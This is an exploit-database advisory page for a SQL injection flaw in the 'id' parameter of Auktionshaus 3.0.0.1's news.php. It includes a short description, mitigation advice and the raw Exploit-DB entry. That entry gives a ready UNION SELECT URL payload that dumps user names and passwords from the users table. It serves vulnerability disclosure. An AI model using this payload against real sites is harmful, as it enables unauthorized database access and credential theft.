header-logo
Suggest Exploit
vendor:
Auktionshaus
by:
Easy Laster
8,8
CVSS
HIGH
SQL Injection
89
CWE
Product Name: Auktionshaus
Affected Version From: 3.0.0.1
Affected Version To: 3.0.0.1
Patch Exists: NO
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2020

Auktionshaus 3.0.0.1 news.php (id) SQL Injection

A vulnerability in the Auktionshaus 3.0.0.1 news.php script can be exploited to perform an SQL injection attack. The vulnerability is caused due to the 'id' parameter not properly sanitized before being used in an SQL query. This can be exploited to inject or manipulate SQL queries in the backend database. An attacker can exploit this vulnerability to gain access to sensitive information from the database, such as usernames and passwords.

Mitigation:

Input validation should be used to ensure that untrusted data is not used to construct SQL queries that are executed on the backend database.
Source

Exploit-DB raw data:

----------------------------Information------------------------------------------------
+Name : Auktionshaus 3.0.0.1 news.php (id) SQL Injection
+Autor : Easy Laster
+Price : 59.95€
+Language :PHP
+Discovered by Easy Laster
+Security Group 4004-Security-Project
+Greetz to Team-Internet ,Underground Agents
+And all Friends of Cyberlive : R!p,Eddy14,Silent Vapor,Nolok,
Kiba,-tmh-,Dr Chaos,HANN!BAL,Kabel,-=Player=-,Lidloses_Auge,
N00bor,Damian,novaca!ne.

---------------------------------------------------------------------------------------
                                                                                     
 ___ ___ ___ ___                         _ _           _____           _         _   
| | |   |   | | |___ ___ ___ ___ _ _ ___|_| |_ _ _ ___|  _  |___ ___  |_|___ ___| |_ 
|_  | | | | |_  |___|_ -| -_|  _| | |  _| |  _| | |___|   __|  _| . | | | -_|  _|  _|
  |_|___|___| |_|   |___|___|___|___|_| |_|_| |_  |   |__|  |_| |___|_| |___|___|_|  
                                              |___|                 |___|            


----------------------------------------------------------------------------------------
+Vulnerability : www.site.com/auktionshaus/news.php?id=
+Exploitable   : www.site.com/auktionshaus/news.php?id=11111111+union+select+1,2,
concat(name,0x3a,password),4,5+from+users
-----------------------------------------------------------------------------------------

Navigation

Suggest Exploit

Services By CQR